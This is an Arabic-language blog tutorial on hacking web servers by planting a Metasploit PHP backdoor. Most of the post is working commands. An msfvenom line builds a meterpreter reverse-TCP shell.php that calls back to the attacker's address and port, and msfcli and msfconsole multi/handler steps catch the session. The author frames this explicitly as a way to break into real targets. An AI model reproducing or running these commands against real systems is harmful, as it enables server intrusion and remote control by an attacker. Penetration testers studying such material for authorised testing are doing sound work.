إختراق خوادم الويب من خلال باكدور ميتاسبوليت PHP | Hackshow Blog Hackshowblog

ربنا لاتؤاخذنا ان نسينا او اخطئنا ربنا ولا تحمل علينا اصرا كما حملته على الذين من قبلنا ربنا لا تحملنا مالا طاقة لنا به واعف عنا واغفر لنا وارحمنا انت مولانا فانصرنا على القوم الكافرين

mardi 24 juin 2014
10:45

إختراق خوادم الويب من خلال باكدور ميتاسبوليت PHP

advertisements



كيفكم حبآيبي ان شاء الله الجميع بخير وفي صحة وعافية 

اليوم باذن الله راح نتكلم 

عن أختراق خوادم الويب من خلال باكدور ميتاسبوليت PHP


مستلزمات لتطبيق على جهازك : 


Apache2

Php shell

Metasploit



امر تنصيب Apache :

sudo apt-get install apache2

لقرائة PHP على السرفر :

sudo apt-get install libapache2-mod-php5

تصريح ملف PHP :

chmod 644 file.php

الأن نمر مباشرة الى تريمنال ونكتب امر تالي 


msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.11 LPORT=81 -f raw > shell.php


شرح اوامر : 


P: تعني بايلود

LHOST : عنوان ايبي الخاص بك سواء الخارجي او داخلي 



LPORT: بورت الذي ستصل عليه البايلود



F Raw : Format Raw 



البايلود الذي اخترناه بعد استغلال يقوم باتصال بجهازنا على بورت المحدد فوق , 


ملاحظة : يجب اظافة وسوم بي اتش بي للباكدور RAW FORMAT

<? php ?>



وبعدها نكتب امر تالي : 



msfcli multi/handler LHOST=192.168.1.11 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E


E: exploit


طيب امر واضح شغلنا سكريبت msfcli لتسريع امر شوي طبعا هذا السكريبت يستعمل 

عموما في عمل شروحات يعني




غير صالح لو حبيت تخترق حقيقة الهدف ,,, ﻻزمك تفتح تريمنال. 


لذلك في حالة وجود المشاكيل نقوم بانتقال الى طريقة المعتادة

msfconsole

use multi/handler

set payload php/meterpreter_reverse_tcp

set lhost 192.168.1.11

set lport 81 

exploit 

تطبيق الشرح : 







قـد يـهمـك أيــضا ..

كـريمَ

مــبرمج و مهتم بأمن المعلومات و بجديد التقنيات سبق لي ان قدمت دورات امنية و برمجية, و الطريق طويل بادن الله

-

0 commentaires :

Enregistrer un commentaire